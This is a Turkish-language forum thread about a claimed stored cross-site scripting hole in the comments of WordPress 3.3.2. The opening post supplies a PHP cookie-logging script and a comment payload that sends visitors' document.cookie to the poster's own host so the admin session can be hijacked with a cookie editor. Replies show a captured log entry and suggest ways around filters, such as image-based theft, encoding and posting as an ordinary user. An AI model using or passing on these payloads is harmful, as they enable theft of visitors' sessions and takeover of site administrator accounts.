

Wordpress 3.3.2 (Son Sürüm )0Day Cross Site Scripting Açığı !!!
-
Arkadaşlar Wordpresin son sürümünde xss Açığı mevcut yorum bölümüne eklenen javascript kodları çalışmakta
örnek olarark şunun ekleyin deneyin
<script>alert(Tahribat.com SeRDaR)</script> Çalıştığının göreceksiniz şimdi bu yolla cookie bilgisini alalım<?php $ip = $_SERVER['REMOTE_ADDR']; $cookie = $_GET['c']; $referer = $_SERVER['HTTP_REFERER']; $browser = $_SERVER['HTTP_USER_AGENT']; $redirect = $_GET['redirect']; $data = "IP: " . $ip . "\n" ."Cookie: " . $cookie . "\n" ."Referrer: " . $referer . "\n" ."Browser: " . $browser . "\n\n"; $log = "log.txt"; @chmod($log, 0777); $f = fopen($log, 'a'); fwrite($f, $data); fclose($f); ?>
Bu kodları xxx.php olarark sunucunuza atın attığınız dizine birde log.txt adında text belgesi atın chmod 777 yapın sonra ise yorum bölümüne
<script>window.open("http://www.siteniz.com/dizin/xxx.php?c="+document.cookie)</script>
şeklinde eklediğinizde girenlerin cookieleri log.txt de loglanacaktır şanmsınıza adminin cookie loglanırnırsa cookie editörle giriş de yapabilirsiniz.yeterince açıklayıcı olmuştur umarım. -
lan bi korkuyla girdim siteye güncelledim her bişeyi, sağol.
-
IP: 94.54.189.*** Cookie: Referrer: Browser: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
buda log.txt in icindeki .
kendi sitemde kendi üstümde denedim.. Cookie gostermiyor?
edit : calisiyor :) lakin firefox ie engelliyor yeni pencere acmasina izin vermiyor. -
hacı son sürüm 3.3.2
ya başlık yanlış ya son sürüm açığı değil bu.
-
çok kurcaladım açıkçası uğraşacak vaktimde yok vaktiniz varsa sizler birde Başka bir sniffer la deneyin olmadı direk kod değilde image üzerinden cookie çekmeyi deneyin kriptolayıp deneyin vs vs yolları çok
-
index ve hit kaybını göze alarak tek tıklama ile sildim wp yi lanet ettirdi ya..
-
admin yetkisinden yapmayın user olarak deneyin filitreye takılır